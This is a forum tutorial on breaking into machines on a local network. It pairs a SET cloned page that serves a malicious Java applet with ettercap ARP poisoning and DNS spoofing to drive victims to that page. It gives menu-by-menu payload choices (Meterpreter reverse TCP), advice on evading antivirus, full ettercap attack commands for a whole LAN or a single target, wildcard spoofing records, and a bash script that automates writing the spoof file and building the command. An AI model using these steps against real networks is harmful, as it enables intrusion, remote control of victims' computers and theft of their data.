How to get into local machines using SET + ETTERCAP
I don't know if this is the right place in the Expert Section, but I don't think this fits into General Topics and I can't post directly into the Howtos section.
This Howto describes how to use SET and ettercap (with its dns_spoof plugin) together effectively: SET serves a cloned page that pushes a malicious Java applet, and ettercap poisons ARP on the LAN and forges DNS answers so that the victims' browsers land on that page.
Step 1: Setting up the Fake-Page
a. Start SET
b. Choose Website Attack Vectors by typing 1
c. Choose the Java Applet Attack Method
d. Here choose Custom Import, so you can clone the site into which you want to inject the drive-by yourself and edit the content of the cloned page before SET does its evil stuff with it :P. For example, I cloned www.java.com/en/, and after cloning I edited index.html, changing the "JAVA + YOU, DOWNLOAD TODAY" part to something like "IMPORTANT JAVA UPDATE". You don't have to use this option; you can simply use SET's Site Cloner instead.
e. After choosing your site, you have to choose the payload. I recommend choice 2 (Windows Reverse_TCP Meterpreter), or, if you know your target runs a 64-bit operating system, choice 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one was completely FUD (not flagged by antivirus) at the time of writing. Remember that a reverse_tcp payload connects back to the IP and port you enter here, so the victim must be able to reach that address; on the local network this is simply your LAN IP.
f. Now you have to choose the encoding of the payload so that it is not detected by the victim's AV. Just choose 16 (Backdoored Executable), which is currently the best. Encoding only changes the static signature of the file; AV detection catches up over time, so test the generated executable against a copy of the target's AV before relying on it.
g. SET now sets up a Metasploit listener (multi/handler), which will show you when someone has run your Java drive-by. You MUST keep this window open: closing it kills the handler and any Meterpreter sessions with it.
Step 2: Use ettercap to redirect the victim(s) to your fake site
a. The first thing you have to do is open the etter.dns file, located in /usr/share/ettercap (on newer ettercap packages, e.g. on Kali, it is /etc/ettercap/etter.dns instead). Delete everything in it. Each line is a record of the form "name type value"; the dns_spoof plugin answers matching queries with the value you give. If you want to redirect every site your victim visits, a single wildcard A record pointing at your IP is enough:
* A yourip
If you only want to redirect one page, write this instead (use "*.example.com" to catch a whole zone):
thesiteyouwanttoredirect A yourip
In my specific case the etter.dns file contains only the wildcard entry, so everything gets redirected to my fake page.
b. Running ettercap
After configuring everything, you can run the following command. It poisons the whole local network, meaning every PC on your LAN is redirected to your fake page:
ettercap -T -q -P dns_spoof -M ARP // //
If you want to redirect only one single PC, run this command instead:
ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //
Two caveats: the target syntax above is the ettercap 0.7 form; ettercap 0.8.x built with IPv6 support expects MAC/IP/IPv6/PORTs, so the victim spec becomes /ipofyourvictim// (note the extra slash). And dns_spoof can only forge replies for DNS queries that pass through your machine, so the victim's resolver traffic must be in the poisoned path; putting the gateway in the second target group (/ipofyourvictim/ /gatewayip/) is the quietest way to ensure that. Sites served over HTTPS will show certificate errors on the cloned page, because your server cannot present a valid certificate for the spoofed name.
And here is what the parameters actually mean:
-T means text interface, so you get no GUI
-q means quiet mode: ettercap doesn't print every packet it handles (which would be really annoying)
-P dns_spoof means ettercap loads the dns_spoof plugin, which is responsible for the redirecting
-M ARP means an ARP-poisoning man-in-the-middle attack: the traffic in your network passes through your PC first. The two trailing target groups (// //) select which hosts get poisoned; an empty group means all hosts.
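The following shell helper is an added example and is not part of the original post or of SET/ettercap: it builds the etter.dns entries described in Step 2 (wildcard, zone or single name), validates the attacker IP so a typo does not silently produce a file ettercap ignores, backs up and writes the file, and assembles the matching ettercap command line for the whole-LAN, single-victim and victim-plus-gateway cases. It assumes the ettercap 0.8.x record syntax ("name A ip") and the two common etter.dns locations; it never runs ettercap itself.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): generate etter.dns for the
# dns_spoof plugin and print the ettercap command that uses it.
# Assumptions: record syntax "name A ip" (ettercap 0.8.x), candidate file
# paths below; nothing here executes ettercap.

# Return 0 if $1 is a dotted-quad IPv4 address with octets in 0..255.
valid_ipv4() {
    case "$1" in
        *[!0-9.]*|*..*|.*|*.|'') return 1 ;;
    esac
    set -- $(printf '%s' "$1" | tr '.' ' ')
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
}

# Print etter.dns content mapping each NAME to ATTACKER_IP.
# Usage: make_etter_dns ATTACKER_IP NAME...
# NAME may be '*' (every query) or '*.example.com' (a whole zone).
make_etter_dns() {
    local ip="$1"; shift
    valid_ipv4 "$ip" || { echo "make_etter_dns: bad IPv4 '$ip'" >&2; return 1; }
    [ "$#" -gt 0 ] || { echo "make_etter_dns: no names given" >&2; return 1; }
    local name
    for name in "$@"; do
        printf '%s A %s\n' "$name" "$ip"
    done
}

# Print the etter.dns path: first existing candidate, else the path the
# post uses (/usr/share/ettercap/etter.dns).
etter_dns_path() {
    local p
    for p in /etc/ettercap/etter.dns /usr/share/ettercap/etter.dns; do
        [ -f "$p" ] && { printf '%s\n' "$p"; return 0; }
    done
    printf '%s\n' /usr/share/ettercap/etter.dns
}

# Back up PATH (if present) to PATH.bak and overwrite it with fresh records.
# Usage: write_etter_dns PATH ATTACKER_IP NAME...
write_etter_dns() {
    local path="$1"; shift
    local content
    content=$(make_etter_dns "$@") || return 1
    [ -f "$path" ] && cp -- "$path" "$path.bak"
    printf '%s\n' "$content" >"$path"
}

# Print the ettercap command line for the chosen target groups.
# Usage: ettercap_cmd [VICTIM_IP [GATEWAY_IP]]
#   no args    -> "// //": poison the whole LAN
#   VICTIM     -> poison VICTIM against everyone
#   VICTIM GW  -> poison VICTIM and the gateway against each other (quietest;
#                 guarantees the victim's DNS queries cross your machine)
# Target groups use the 0.7-style "/ip/" form from the post; on ettercap
# 0.8.x built with IPv6 the spec is MAC/IP/IPv6/PORTs, i.e. "/ip//".
ettercap_cmd() {
    local victim="${1:-}" gw="${2:-}"
    local t1="//" t2="//"
    if [ -n "$victim" ]; then
        valid_ipv4 "$victim" || return 1
        t1="/$victim/"
    fi
    if [ -n "$gw" ]; then
        valid_ipv4 "$gw" || return 1
        t2="/$gw/"
    fi
    printf 'ettercap -T -q -P dns_spoof -M arp %s %s\n' "$t1" "$t2"
}

# Example run (attacker 192.168.1.10, victim 192.168.1.5, gateway 192.168.1.1):
#   write_etter_dns "$(etter_dns_path)" 192.168.1.10 '*'
#   ettercap_cmd 192.168.1.5 192.168.1.1
```

The mitm method is spelled lowercase ("-M arp") as in the ettercap man page; the post's uppercase "ARP" is accepted as well. Run the write step as root, since the etter.dns file is only writable by root.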
So that's it. I hope you like my tutorial, and if you do, please comment. If you have any questions, feel free to ask me!
Tutorial by Fiddl aka Jodokus